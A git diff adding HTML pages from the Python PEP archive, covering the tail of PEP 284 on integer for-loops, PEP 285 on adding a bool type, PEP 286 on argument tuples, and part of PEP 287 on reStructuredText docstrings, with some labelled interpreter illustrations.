  • The proposal does not allow increments other than 1 and -1. +More general arithmetic progressions would need to be created by +range() or xrange(), or by a list comprehension syntax such as
    [2*x for 0 <= x <= 100]
    +
    +
    +
  • +
  • The position of the loop variable in the middle of a three-way +comparison is not as apparent as the variable in the present
    for item in list
    +
    +
    +

    syntax, leading to a possible loss of readability. We feel that +this loss is outweighed by the increase in readability from a +natural integer iteration syntax.

    +
  • +
  • To some extent, this PEP addresses the same issues as PEP 276. +We feel that the two PEPs are not in conflict since PEP 276 +is primarily concerned with half-open ranges starting in 0 +(the easy case of range()) while this PEP is primarily concerned +with simplifying all other cases. However, if this PEP is +approved, its new simpler syntax for integer loops could to some +extent reduce the motivation for PEP 276.
  • +
  • It is not clear whether it makes sense to allow floating point +bounds for an integer loop: if a float represents an inexact +value, how can it be used to determine an exact sequence of +integers? On the other hand, disallowing float bounds would +make it difficult to use floor() and ceiling() in integer +for-loops, as it is difficult to use them now with range(). We +have erred on the side of flexibility, but this may lead to some +implementation difficulties in determining the smallest and +largest integer values that would cause a given comparison to be +true.
  • +
  • Should types other than int, long, and float be allowed as +bounds? Another choice would be to convert all bounds to +integers by int(), and allow as bounds anything that can be so +converted instead of just floats. However, this would change +the semantics: 0.3 <= x is not the same as int(0.3) <= x, and it +would be confusing for a loop with 0.3 as lower bound to start +at zero. Also, in general int(f) can be very far from f.
  • +
+
+
+

Implementation

+

An implementation is not available at this time. Implementation +is not expected to pose any great difficulties: the new syntax +could, if necessary, be recognized by parsing a general expression +after each “for” keyword and testing whether the top level +operation of the expression is “in” or a three-way comparison. +The Python compiler would convert any instance of the new syntax +into a loop over the items in a special iterator object.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0284.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0285/index.html b/pep-0285/index.html new file mode 100644 index 00000000000..57c559acf62 --- /dev/null +++ b/pep-0285/index.html @@ -0,0 +1,511 @@ + PEP 285 – Adding a bool type | peps.python.org +
+
+


+ + +
+
+
+

PEP 285 – Adding a bool type

+
+
Author:
+
Guido van Rossum <guido at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
08-Mar-2002
+
Python-Version:
+
2.3
+
Post-History:
+
08-Mar-2002, 30-Mar-2002, 03-Apr-2002
+
+
+
+
+
+

Abstract

+

This PEP proposes the introduction of a new built-in type, bool, +with two constants, False and True. The bool type would be a +straightforward subtype (in C) of the int type, and the values +False and True would behave like 0 and 1 in most respects (for +example, False==0 and True==1 would be true) except repr() and +str(). All built-in operations that conceptually return a Boolean +result will be changed to return False or True instead of 0 or 1; +for example, comparisons, the “not” operator, and predicates like +isinstance().

+
+
+

Review

+

I’ve collected enough feedback to last me a lifetime, so I declare +the review period officially OVER. I had Chinese food today; my +fortune cookie said “Strong and bitter words indicate a weak +cause.” It reminded me of some of the posts against this +PEP… :-)

+

Anyway, here are my BDFL pronouncements. (Executive summary: I’m +not changing a thing; all variants are rejected.)

+
    +
  1. Should this PEP be accepted?

    => Yes.

    +

    There have been many arguments against the PEP. Many of them +were based on misunderstandings. I’ve tried to clarify some of +the most common misunderstandings below in the main text of the +PEP. The only issue that weighs at all for me is the tendency +of newbies to write “if x == True” where “if x” would suffice. +More about that below too. I think this is not a sufficient +reason to reject the PEP.

    +
  2. Should str(True) return “True” or “1”? “1” might reduce +backwards compatibility problems, but looks strange. +(repr(True) would always return “True”.)

    => “True”.

    +

    Almost all reviewers agree with this.

    +
  3. Should the constants be called ‘True’ and ‘False’ (similar to +None) or ‘true’ and ‘false’ (as in C++, Java and C99)?

    => True and False.

    +

    Most reviewers agree that consistency within Python is more +important than consistency with other languages.

    +
  4. Should we strive to eliminate non-Boolean operations on bools +in the future, through suitable warnings, so that for example +True+1 would eventually (in Python 3000) be illegal?

    => No.

    +

    There’s a small but vocal minority that would prefer to see +“textbook” bools that don’t support arithmetic operations at +all, but most reviewers agree with me that bools should always +allow arithmetic operations.

    +
  5. Should operator.truth(x) return an int or a bool?

    => bool.

    +

    Tim Peters believes it should return an int, but almost all +other reviewers agree that it should return a bool. My +rationale: operator.truth() exists to force a Boolean context +on its argument (it calls the C API PyObject_IsTrue()). +Whether the outcome is reported as int or bool is secondary; if +bool exists there’s no reason not to use it. (Under the PEP, +operator.truth() now becomes an alias for bool(); that’s fine.)

    +
  6. Should bool inherit from int?

    => Yes.

    +

    In an ideal world, bool might be better implemented as a +separate integer type that knows how to perform mixed-mode +arithmetic. However, inheriting bool from int eases the +implementation enormously (in part since all C code that calls +PyInt_Check() will continue to work – this returns true for +subclasses of int). Also, I believe this is right in terms of +substitutability: code that requires an int can be fed a bool +and it will behave the same as 0 or 1. Code that requires a +bool may not work when it is given an int; for example, 3 & 4 +is 0, but both 3 and 4 are true when considered as truth +values.

    +
  7. Should the name ‘bool’ be changed?

    => No.

    +

    Some reviewers have argued for boolean instead of bool, because +this would be easier to understand (novices may have heard of +Boolean algebra but may not make the connection with bool) or +because they hate abbreviations. My take: Python uses +abbreviations judiciously (like ‘def’, ‘int’, ‘dict’) and I +don’t think these are a burden to understanding. To a newbie, +it doesn’t matter whether it’s called a waffle or a bool; it’s +a new word, and they learn quickly what it means.

    +

    One reviewer has argued to make the name ‘truth’. I find this +an unattractive name, and would actually prefer to reserve this +term (in documentation) for the more abstract concept of truth +values that already exists in Python. For example: “when a +container is interpreted as a truth value, an empty container +is considered false and a non-empty one is considered true.”

    +
  8. Should we strive to require that Boolean operations (like “if”, +“and”, “not”) have a bool as an argument in the future, so that +for example “if []:” would become illegal and would have to be +written as “if bool([]):” ???

    => No!!!

    +

    Some people believe that this is how a language with a textbook +Boolean type should behave. Because it was brought up, others +have worried that I might agree with this position. Let me +make my position on this quite clear. This is not part of the +PEP’s motivation and I don’t intend to make this change. (See +also the section “Clarification” below.)

    +
+
+
+

Rationale

+

Most languages eventually grow a Boolean type; even C99 (the new +and improved C standard, not yet widely adopted) has one.

+

Many programmers apparently feel the need for a Boolean type; most +Python documentation contains a bit of an apology for the absence +of a Boolean type. I’ve seen lots of modules that defined +constants “False=0” and “True=1” (or similar) at the top and used +those. The problem with this is that everybody does it +differently. For example, should you use “FALSE”, “false”, +“False”, “F” or even “f”? And should false be the value zero or +None, or perhaps a truth value of a different type that will print +as “true” or “false”? Adding a standard bool type to the language +resolves those issues.

+

Some external libraries (like databases and RPC packages) need to +be able to distinguish between Boolean and integral values, and +while it’s usually possible to craft a solution, it would be +easier if the language offered a standard Boolean type. This also +applies to Jython: some Java classes have separately overloaded +methods or constructors for int and boolean arguments. The bool +type can be used to select the boolean variant. (The same is +apparently the case for some COM interfaces.)

+

The standard bool type can also serve as a way to force a value to +be interpreted as a Boolean, which can be used to normalize +Boolean values. When a Boolean value needs to be normalized to +one of two values, bool(x) is much clearer than “not not x” and +much more concise than

+
if x:
+    return 1
+else:
+    return 0
+
+
+

Here are some arguments derived from teaching Python. When +showing people comparison operators etc. in the interactive shell, +I think this is a bit ugly:

+
>>> a = 13
+>>> b = 12
+>>> a > b
+1
+>>>
+
+
+

If this was:

+
>>> a > b
+True
+>>>
+
+
+

it would require a millisecond less thinking each time a 0 or 1 +was printed.

+

There’s also the issue (which I’ve seen baffling even experienced +Pythonistas who had been away from the language for a while) that +if you see:

+
>>> cmp(a, b)
+1
+>>> cmp(a, a)
+0
+>>>
+
+
+

you might be tempted to believe that cmp() also returned a truth +value, whereas in reality it can return three different values +(-1, 0, 1). If ints were not (normally) used to represent +Boolean results, this would stand out much more clearly as +something completely different.

+
+
+

Specification

+

The following Python code specifies most of the properties of the +new type:

+
class bool(int):
+
+    def __new__(cls, val=0):
+        # This constructor always returns an existing instance
+        if val:
+            return True
+        else:
+            return False
+
+    def __repr__(self):
+        if self:
+            return "True"
+        else:
+            return "False"
+
+    __str__ = __repr__
+
+    def __and__(self, other):
+        if isinstance(other, bool):
+            return bool(int(self) & int(other))
+        else:
+            return int.__and__(self, other)
+
+    __rand__ = __and__
+
+    def __or__(self, other):
+        if isinstance(other, bool):
+            return bool(int(self) | int(other))
+        else:
+            return int.__or__(self, other)
+
+    __ror__ = __or__
+
+    def __xor__(self, other):
+        if isinstance(other, bool):
+            return bool(int(self) ^ int(other))
+        else:
+            return int.__xor__(self, other)
+
+    __rxor__ = __xor__
+
+# Bootstrap truth values through sheer willpower
+False = int.__new__(bool, 0)
+True = int.__new__(bool, 1)
+
+
+

The values False and True will be singletons, like None. Because +the type has two values, perhaps these should be called +“doubletons”? The real implementation will not allow other +instances of bool to be created.
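
The singleton behavior is easy to observe in a modern interpreter
(illustration, not part of the PEP text):

    >>> bool(1) is True
    True
    >>> bool([]) is False
    True
    >>> (1 == 1) is True
    True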

+

True and False will properly round-trip through pickling and +marshalling; for example pickle.loads(pickle.dumps(True)) will +return True, and so will marshal.loads(marshal.dumps(True)).

+

All built-in operations that are defined to return a Boolean +result will be changed to return False or True instead of 0 or 1. +In particular, this affects comparisons (<, <=, ==, !=, +>, >=, is, is not, in, not in), the unary operator ‘not’, the built-in +functions callable(), hasattr(), isinstance() and issubclass(), +the dict method has_key(), the string and unicode methods +endswith(), isalnum(), isalpha(), isdigit(), islower(), isspace(), +istitle(), isupper(), and startswith(), the unicode methods +isdecimal() and isnumeric(), and the ‘closed’ attribute of file +objects. The predicates in the operator module are also changed +to return a bool, including operator.truth().

+

Because bool inherits from int, True+1 is valid and equals 2, and +so on. This is important for backwards compatibility: because +comparisons and so on currently return integer values, there’s no +way of telling what uses existing applications make of these +values.
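
For illustration (interpreter output, not from the PEP), including the
3 & 4 example from the Review section above:

    >>> True + 1
    2
    >>> ["zero", "one"][True]
    'one'
    >>> 3 & 4              # as ints, bitwise "and" is 0 ...
    0
    >>> bool(3) & bool(4)  # ... but as bools, both are true
    True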

+

It is expected that over time, the standard library will be +updated to use False and True when appropriate (but not to require +a bool argument type where previously an int was allowed). This +change should not pose additional problems and is not specified in +detail by this PEP.

+
+
+

C API

+

The header file “boolobject.h” defines the C API for the bool +type. It is included by “Python.h” so there is no need to include +it directly.

+

The existing names Py_False and Py_True reference the unique bool +objects False and True (previously these referenced static int +objects with values 0 and 1, which were not unique amongst int +values).

+

A new API, PyObject *PyBool_FromLong(long), takes a C long int +argument and returns a new reference to either Py_False (when the +argument is zero) or Py_True (when it is nonzero).

+

To check whether an object is a bool, the macro PyBool_Check() can +be used.

+

The type of bool instances is PyBoolObject *.

+

The bool type object is available as PyBool_Type.

+
+
+

Clarification

+

This PEP does not change the fact that almost all object types +can be used as truth values. For example, when used in an if +statement, an empty list is false and a non-empty one is true; +this does not change and there is no plan to ever change this.

+

The only thing that changes is the preferred values to represent +truth values when returned or assigned explicitly. Previously, +these preferred truth values were 0 and 1; the PEP changes the +preferred values to False and True, and changes built-in +operations to return these preferred values.
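
A short interpreter session (illustration, not from the PEP) makes the
distinction concrete:

    >>> bool([])       # an empty list is false in a Boolean context ...
    False
    >>> [] == False    # ... but it is not equal to, or replaced by, False
    False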

+
+
+

Compatibility

+

Because of backwards compatibility, the bool type lacks many +properties that some would like to see. For example, arithmetic +operations with one or two bool arguments are allowed, treating +False as 0 and True as 1. Also, a bool may be used as a sequence +index.

+

I don’t see this as a problem, and I don’t want to evolve the +language in this direction either. I don’t believe that a +stricter interpretation of “Booleanness” makes the language any +clearer.

+

Another consequence of the compatibility requirement is that the +expression “True and 6” has the value 6, and similarly the +expression “False or None” has the value None. The “and” and “or” +operators are usefully defined to return the first argument that +determines the outcome, and this won’t change; in particular, they +don’t force the outcome to be a bool. Of course, if both +arguments are bools, the outcome is always a bool. It can also +easily be coerced into being a bool by writing for example “bool(x +and y)”.
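
For illustration (interpreter output, not from the PEP):

    >>> True and 6
    6
    >>> (False or None) is None
    True
    >>> True and True        # both arguments bools: the result is a bool
    True
    >>> bool(True and 6)     # coercing the outcome explicitly
    True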

+
+
+

Resolved Issues

+

(See also the Review section above.)

+
    +
  • Because the repr() or str() of a bool value is different from an +int value, some code (for example doctest-based unit tests, and +possibly database code that relies on things like “%s” % truth) +may fail. It is easy to work around this (without explicitly +referencing the bool type), and it is expected that this only +affects a very small amount of code that can easily be fixed.
  • +
  • Other languages (C99, C++, Java) name the constants “false” and +“true”, in all lowercase. For Python, I prefer to stick with +the example set by the existing built-in constants, which all +use CapitalizedWords: None, Ellipsis, NotImplemented (as well as +all built-in exceptions). Python’s built-in namespace uses all +lowercase for functions and types only.
  • +
  • It has been suggested that, in order to satisfy user +expectations, for every x that is considered true in a Boolean +context, the expression x == True should be true, and likewise +if x is considered false, x == False should be true. In +particular newbies who have only just learned about Boolean +variables are likely to write
    if x == True: ...
    +
    +
    +

    instead of the correct form,

    +
    if x: ...
    +
    +
    +

There seem to be strong psychological and linguistic reasons why +many people are at first uncomfortable with the latter form, but +I believe that the solution should be in education rather than +in crippling the language. After all, == is generally seen as a +transitive operator, meaning that from a==b and b==c we can +deduce a==c. But if any comparison to True were to report +equality when the other operand was a true value of any type, +atrocities like 6==True==7 would hold true, from which one could +infer the falsehood 6==7. That’s unacceptable. (In addition, +it would break backwards compatibility. But even if it didn’t, +I’d still be against this, for the stated reasons.)

    +

    Newbies should also be reminded that there’s never a reason to +write

    +
    if bool(x): ...
    +
    +
    +

    since the bool is implicit in the “if”. Explicit is not +better than implicit here, since the added verbiage impairs +readability and there’s no other interpretation possible. There +is, however, sometimes a reason to write

    +
    b = bool(x)
    +
    +
    +

    This is useful when it is unattractive to keep a reference to an +arbitrary object x, or when normalization is required for some +other reason. It is also sometimes appropriate to write

    +
    i = int(bool(x))
    +
    +
    +

    which converts the bool to an int with the value 0 or 1. This +conveys the intention to henceforth use the value as an int.

    +
  • +
+
+
+

Implementation

+

A complete implementation in C has been uploaded to the +SourceForge patch manager: https://bugs.python.org/issue528022

+

This will soon be checked into CVS for python 2.3a0.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0285.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0286/index.html b/pep-0286/index.html new file mode 100644 index 00000000000..20df0702086 --- /dev/null +++ b/pep-0286/index.html @@ -0,0 +1,238 @@ + PEP 286 – Enhanced Argument Tuples | peps.python.org +
+
+


+ + +
+
+
+

PEP 286 – Enhanced Argument Tuples

+
+
Author:
+
Martin von Löwis <martin at v.loewis.de>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
03-Mar-2002
+
Python-Version:
+
2.3
+
Post-History:
+

+
+
+
+
+
+

Abstract

+

PyArg_ParseTuple is confronted with difficult memory management if +an argument converter creates new memory. To deal with these +cases, a specialized argument type is proposed.

+
+
+

PEP Deferral

+

Further exploration of the concepts covered in this PEP has been deferred +for lack of a current champion interested in promoting the goals of the +PEP and collecting and incorporating feedback, and with sufficient +available time to do so effectively.

+

The resolution of this PEP may also be affected by the resolution of +PEP 436, which proposes the use of a preprocessing step to generate +some aspects of C API interface code.

+
+
+

Problem description

+

Today, argument tuples keep references to the function arguments, +which are guaranteed to live as long as the argument tuple exists, +which is at least as long as the function call is being executed.

+

In some cases, parsing an argument will allocate new memory, which +is then to be released by the caller. This has two problems:

+
    +
  1. In case of failure, the application cannot know what memory to +release; most callers don’t even know that they have the +responsibility to release that memory. Example for this are +the N converter (bug #416288 [1]) and the es# converter (bug +#501716 [2]).
  2. Even for successful argument parsing, it is still inconvenient +for the caller to be responsible for releasing the memory. In +some cases, this is unnecessarily inefficient. For example, +the es converter copies the conversion result into memory, even +though there already is a string object that has the right +contents.
+
+
+

Proposed solution

+

A new type ‘argument tuple’ is introduced. This type derives from +tuple, adding an __dict__ member (at tp_dictoffset -4). Instances +of this type might get the following attributes:

+
    +
  • ‘failobjects’, a list of objects which need to be deallocated +in case of success
  • +
  • ‘okobjects’, a list of objects which will be released when the +argument tuple is released
  • +
+

To manage this type, the following functions will be added, and +used appropriately in ceval.c and getargs.c:

+
    +
  • PyArgTuple_New(int);
  • +
  • PyArgTuple_AddFailObject(PyObject*, PyObject*);
  • +
  • PyArgTuple_AddFailMemory(PyObject*, void*);
  • +
  • PyArgTuple_AddOkObject(PyObject*, PyObject*);
  • +
  • PyArgTuple_AddOkMemory(PyObject*, void*);
  • +
  • PyArgTuple_ClearFailed(PyObject*);
  • +
+

When argument parsing fails, all fail objects will be released +through Py_DECREF, and all fail memory will be released through +PyMem_Free. If parsing succeeds, the references to the fail +objects and fail memory are dropped, without releasing anything.

+

When the argument tuple is released, all ok objects and memory +will be released.

+

If those functions are called with an object of a different type, +a warning is issued and no further action is taken; usage of the +affected converters without using argument tuples is deprecated.

+
+
+

Affected converters

+

The following converters will add fail memory and fail objects: N, +es, et, es#, et# (unless memory is passed into the converter)

+
+
+

New converters

+

To simplify Unicode conversion, the e* converters are duplicated +as E* converters (Es, Et, Es#, Et#). The usage of the E* +converters is identical to that of the e* converters, except that +the application will not need to manage the resulting memory. +This will be implemented through registration of Ok objects with +the argument tuple. The e* converters are deprecated.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0286.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0287/index.html b/pep-0287/index.html new file mode 100644 index 00000000000..b449e0bb6e8 --- /dev/null +++ b/pep-0287/index.html @@ -0,0 +1,763 @@ + PEP 287 – reStructuredText Docstring Format | peps.python.org +
+
+


+ + +
+
+
+

PEP 287 – reStructuredText Docstring Format

+
+
Author:
+
David Goodger <goodger at python.org>
+
Discussions-To:
+
Doc-SIG list
+
Status:
+
Active
+
Type:
+
Informational
+
Created:
+
25-Mar-2002
+
Post-History:
+
02-Apr-2002
+
Replaces:
+
216
+
+
+
+
+
+

Abstract

+

When plaintext hasn’t been expressive enough for inline documentation, +Python programmers have sought out a format for docstrings. This PEP +proposes that the reStructuredText markup be adopted as a standard +markup format for structured plaintext documentation in Python +docstrings, and for PEPs and ancillary documents as well. +reStructuredText is a rich and extensible yet easy-to-read, +what-you-see-is-what-you-get plaintext markup syntax.

+

Only the low-level syntax of docstrings is addressed here. This PEP +is not concerned with docstring semantics or processing at all (see +PEP 256 for a “Road Map to the Docstring PEPs”). Nor is it an attempt +to deprecate pure plaintext docstrings, which are always going to be +legitimate. The reStructuredText markup is an alternative for those +who want more expressive docstrings.

+
+
+

Benefits

+

Programmers are by nature a lazy breed. We reuse code with functions, +classes, modules, and subsystems. Through its docstring syntax, +Python allows us to document our code from within. The “holy grail” +of the Python Documentation Special Interest Group (Doc-SIG) has been +a markup syntax and toolset to allow auto-documentation, where the +docstrings of Python systems can be extracted in context and processed +into useful, high-quality documentation for multiple purposes.

+

Document markup languages have three groups of customers: the authors +who write the documents, the software systems that process the data, +and the readers, who are the final consumers and the most important +group. Most markups are designed for the authors and software +systems; readers are only meant to see the processed form, either on +paper or via browser software. ReStructuredText is different: it is +intended to be easily readable in source form, without prior knowledge +of the markup. ReStructuredText is entirely readable in plaintext +format, and many of the markup forms match common usage (e.g., +*emphasis*), so it reads quite naturally. Yet it is rich enough +to produce complex documents, and extensible so that there are few +limits. Of course, to write reStructuredText documents some prior +knowledge is required.

+

The markup offers functionality and expressivity, while maintaining +easy readability in the source text. The processed form (HTML etc.) +makes it all accessible to readers: inline live hyperlinks; live links +to and from footnotes; automatic tables of contents (with live +links!); tables; images for diagrams etc.; pleasant, readable styled +text.

+

The reStructuredText parser is available now, part of the Docutils +project. Standalone reStructuredText documents and PEPs can be +converted to HTML; other output format writers are being worked on and +will become available over time. Work is progressing on a Python +source “Reader” which will implement auto-documentation from +docstrings. Authors of existing auto-documentation tools are +encouraged to integrate the reStructuredText parser into their +projects, or better yet, to join forces to produce a world-class +toolset for the Python standard library.
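
Today the parser ships as the docutils package; the following is a minimal
sketch of standalone conversion (it assumes docutils is installed, and is
not part of the PEP itself):

    import textwrap
    from docutils.core import publish_string

    rst_source = textwrap.dedent("""\
        A Section Title
        ===============

        This is *emphasized* text, and this is an ``inline literal``.
        """)

    # publish_string runs the whole reader -> parser -> writer pipeline
    # in memory and returns the rendered document (bytes by default).
    html = publish_string(source=rst_source, writer_name="html")
    print(html.decode("utf-8"))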

+

Tools will become available in the near future, which will allow +programmers to generate HTML for online help, XML for multiple +purposes, and eventually PDF, DocBook, and LaTeX for printed +documentation, essentially “for free” from the existing docstrings. +The adoption of a standard will, at the very least, benefit docstring +processing tools by preventing further “reinventing the wheel”.

+

Eventually PyDoc, the one existing standard auto-documentation tool, +could have reStructuredText support added. In the interim it will +have no problem with reStructuredText markup, since it treats all +docstrings as preformatted plaintext.

+
+
+

Goals

+

These are the generally accepted goals for a docstring format, as +discussed in the Doc-SIG:

+
    +
  1. It must be readable in source form by the casual observer.
  2. It must be easy to type with any standard text editor.
  3. It must not need to contain information which can be deduced from +parsing the module.
  4. It must contain sufficient information (structure) so it can be +converted to any reasonable markup format.
  5. It must be possible to write a module’s entire documentation in +docstrings, without feeling hampered by the markup language.
+

reStructuredText meets and exceeds all of these goals, and sets its +own goals as well, even more stringent. See Docstring-Significant +Features below.

+

The goals of this PEP are as follows:

+
    +
  1. To establish reStructuredText as a standard structured plaintext +format for docstrings (inline documentation of Python modules and +packages), PEPs, README-type files and other standalone documents. +“Accepted” status will be sought through Python community consensus +and eventual BDFL pronouncement.

    Please note that reStructuredText is being proposed as a +standard, not the only standard. Its use will be entirely +optional. Those who don’t want to use it need not.

    +
  2. To solicit and address any related concerns raised by the Python +community.
  3. To encourage community support. As long as multiple competing +markups are out there, the development community remains fractured. +Once a standard exists, people will start to use it, and momentum +will inevitably gather.
  4. To consolidate efforts from related auto-documentation projects. +It is hoped that interested developers will join forces and work on +a joint/merged/common implementation.
+

Once reStructuredText is a Python standard, effort can be focused on +tools instead of arguing for a standard. Python needs a standard set +of documentation tools.

+

With regard to PEPs, one or both of the following strategies may be +applied:

+
    +
  1. Keep the existing PEP section structure constructs (one-line +section headers, indented body text). Subsections can either be +forbidden, or supported with reStructuredText-style underlined +headers in the indented body text.
  2. Replace the PEP section structure constructs with the +reStructuredText syntax. Section headers will require underlines, +subsections will be supported out of the box, and body text need +not be indented (except for block quotes).
+

Strategy (b) is recommended, and its implementation is complete.

+

Support for RFC 2822 headers has been added to the reStructuredText +parser for PEPs (unambiguous given a specific context: the first +contiguous block of the document). It may be desired to concretely +specify what over/underline styles are allowed for PEP section +headers, for uniformity.

+
+
+

Rationale

+

The lack of a standard syntax for docstrings has hampered the +development of standard tools for extracting and converting docstrings +into documentation in standard formats (e.g., HTML, DocBook, TeX). +There have been a number of proposed markup formats and variations, +and many tools tied to these proposals, but without a standard +docstring format they have failed to gain a strong following and/or +floundered half-finished.

+

Throughout the existence of the Doc-SIG, consensus on a single +standard docstring format has never been reached. A lightweight, +implicit markup has been sought, for the following reasons (among +others):

+
    +
  1. Docstrings written within Python code are available from within the +interactive interpreter, and can be “print”ed. Thus the use of +plaintext for easy readability.
  2. Programmers want to add structure to their docstrings, without +sacrificing raw docstring readability. Unadorned plaintext cannot +be transformed (“up-translated”) into useful structured formats.
  3. Explicit markup (like XML or TeX) is widely considered unreadable +by the uninitiated.
  4. Implicit markup is aesthetically compatible with the clean and +minimalist Python syntax.
+

Many alternative markups for docstrings have been proposed on the +Doc-SIG over the years; a representative sample is listed below. Each +is briefly analyzed in terms of the goals stated above. Please note +that this is not intended to be an exclusive list of all existing +markup systems; there are many other markups (Texinfo, Doxygen, TIM, +YODL, AFT, …) which are not mentioned.

+
    +
  • XML, SGML, DocBook, HTML, XHTML

    XML and SGML are explicit, well-formed meta-languages suitable for +all kinds of documentation. XML is a variant of SGML. They are +best used behind the scenes, because to untrained eyes they are +verbose, difficult to type, and too cluttered to read comfortably as +source. DocBook, HTML, and XHTML are all applications of SGML +and/or XML, and all share the same basic syntax and the same +shortcomings.

    +
  • +
  • TeX

    TeX is similar to XML/SGML in that it’s explicit, but not very easy +to write, and not easy for the uninitiated to read.

    +
  • +
  • Perl POD

    Most Perl modules are documented in a format called POD (Plain Old +Documentation). This is an easy-to-type, very low level format with +strong integration with the Perl parser. Many tools exist to turn +POD documentation into other formats: info, HTML and man pages, +among others. However, the POD syntax takes after Perl itself in +terms of readability.

    +
  • +
  • JavaDoc

    Special comments before Java classes and functions serve to document +the code. A program to extract these, and turn them into HTML +documentation is called javadoc, and is part of the standard Java +distribution. However, JavaDoc has a very intimate relationship +with HTML, using HTML tags for most markup. Thus it shares the +readability problems of HTML.

    +
  • +
  • Setext, StructuredText

    Early on, variants of Setext (Structure Enhanced Text), including +Zope Corp’s StructuredText, were proposed for Python docstring +formatting. Hereafter these variants will collectively be called +“STexts”. STexts have the advantage of being easy to read without +special knowledge, and relatively easy to write.

    +

    Although used by some (including in most existing Python +auto-documentation tools), until now STexts have failed to become +standard because:

    +
      +
    • STexts have been incomplete. Lacking “essential” constructs that +people want to use in their docstrings, STexts are rendered less +than ideal. Note that these “essential” constructs are not +universal; everyone has their own requirements.
    • +
    • STexts have been sometimes surprising. Bits of text are +unexpectedly interpreted as being marked up, leading to user +frustration.
    • +
    • SText implementations have been buggy.
    • +
    • Most STexts have no formal specification except for the +implementation itself. A buggy implementation meant a buggy spec, +and vice-versa.
    • +
    • There has been no mechanism to get around the SText markup rules +when a markup character is used in a non-markup context. In other +words, no way to escape markup.
    • +
    +
  • +
+

Proponents of implicit STexts have vigorously opposed proposals for +explicit markup (XML, HTML, TeX, POD, etc.), and the debates have +continued off and on since 1996 or earlier.

+

reStructuredText is a complete revision and reinterpretation of the +SText idea, addressing all of the problems listed above.

+
+
+

Specification

+

The specification and user documentation for reStructuredText is +quite extensive. Rather than repeating or summarizing it all +here, links to the originals are provided.

+

Please first take a look at A ReStructuredText Primer, a short and +gentle introduction. The Quick reStructuredText user reference +quickly summarizes all of the markup constructs. For complete and +extensive details, please refer to the following documents:

+ +

In addition, Problems With StructuredText explains many markup +decisions made with regards to StructuredText, and A Record of +reStructuredText Syntax Alternatives records markup decisions made +independently.

+
+
+

Docstring-Significant Features

+
    +
  • A markup escaping mechanism.

    Backslashes (\) are used to escape markup characters when needed +for non-markup purposes. However, the inline markup recognition +rules have been constructed in order to minimize the need for +backslash-escapes. For example, although asterisks are used for +emphasis, in non-markup contexts such as “*” or “(*)” or “x * y”, +the asterisks are not interpreted as markup and are left unchanged. +For many non-markup uses of backslashes (e.g., describing regular +expressions), inline literals or literal blocks are applicable; see +the next item.

    +
  • +
  • Markup to include Python source code and Python interactive +sessions: inline literals, literal blocks, and doctest blocks.

    Inline literals use double-backquotes to indicate program I/O or +code snippets. No markup interpretation (including backslash-escape +[\] interpretation) is done within inline literals.

    +

    Literal blocks (block-level literal text, such as code excerpts or +ASCII graphics) are indented, and indicated with a double-colon +(“::”) at the end of the preceding paragraph (right here –>):

    +
    if literal_block:
    +    text = 'is left as-is'
    +    spaces_and_linebreaks = 'are preserved'
    +    markup_processing = None
    +
    +
    +

    Doctest blocks begin with “>>> “ and end with a blank line. Neither +indentation nor literal block double-colons are required. For +example:

    +
    Here's a doctest block:
    +
    +>>> print 'Python-specific usage examples; begun with ">>>"'
    +Python-specific usage examples; begun with ">>>"
    +>>> print '(cut and pasted from interactive sessions)'
    +(cut and pasted from interactive sessions)
    +
    +
    +
  • +
  • Markup that isolates a Python identifier: interpreted text.

    Text enclosed in single backquotes is recognized as “interpreted +text”, whose interpretation is application-dependent. In the +context of a Python docstring, the default interpretation of +interpreted text is as Python identifiers. The text will be marked +up with a hyperlink connected to the documentation for the +identifier given. Lookup rules are the same as in Python itself: +LGB namespace lookups (local, global, builtin). The “role” of the +interpreted text (identifying a class, module, function, etc.) is +determined implicitly from the namespace lookup. For example:

    +
    class Keeper(Storer):
    +
    +    """
    +    Keep data fresher longer.
    +
    +    Extend `Storer`.  Class attribute `instances` keeps track
    +    of the number of `Keeper` objects instantiated.
    +    """
    +
    +    instances = 0
    +    """How many `Keeper` objects are there?"""
    +
    +    def __init__(self):
    +        """
    +        Extend `Storer.__init__()` to keep track of
    +        instances.  Keep count in `self.instances` and data
    +        in `self.data`.
    +        """
    +        Storer.__init__(self)
    +        self.instances += 1
    +
    +        self.data = []
    +        """Store data in a list, most recent last."""
    +
    +    def storedata(self, data):
    +        """
    +        Extend `Storer.storedata()`; append new `data` to a
    +        list (in `self.data`).
    +        """
    +        self.data = data
    +
    +
    +

    Each piece of interpreted text is looked up according to the local +namespace of the block containing its docstring.

    +
  • +
  • Markup that isolates a Python identifier and specifies its type: +interpreted text with roles.

    Although the Python source context reader is designed not to require +explicit roles, they may be used. To classify identifiers +explicitly, the role is given along with the identifier in either +prefix or suffix form:

    +
    Use :method:`Keeper.storedata` to store the object's data in
    +`Keeper.data`:instance_attribute:.
    +
    +
    +

    The syntax chosen for roles is verbose, but necessarily so (if +anyone has a better alternative, please post it to the Doc-SIG). +The intention of the markup is that there should be little need to +use explicit roles; their use is to be kept to an absolute minimum.

    +
  • +
  • Markup for “tagged lists” or “label lists”: field lists.

    Field lists represent a mapping from field name to field body. +These are mostly used for extension syntax, such as “bibliographic +field lists” (representing document metadata such as author, date, +and version) and extension attributes for directives (see below). +They may be used to implement methodologies (docstring semantics), +such as identifying parameters, exceptions raised, etc.; such usage +is beyond the scope of this PEP.

    +

    A modified RFC 2822 syntax is used, with a colon before as well as +after the field name. Field bodies are more versatile as well; +they may contain multiple field bodies (even nested field lists). +For example:

    +
    :Date: 2002-03-22
    +:Version: 1
    +:Authors:
    +    - Me
    +    - Myself
    +    - I
    +
    +
    +

    Standard RFC 2822 header syntax cannot be used for this construct +because it is ambiguous. A word followed by a colon at the +beginning of a line is common in written text.

    +
  • +
  • Markup extensibility: directives and substitutions.

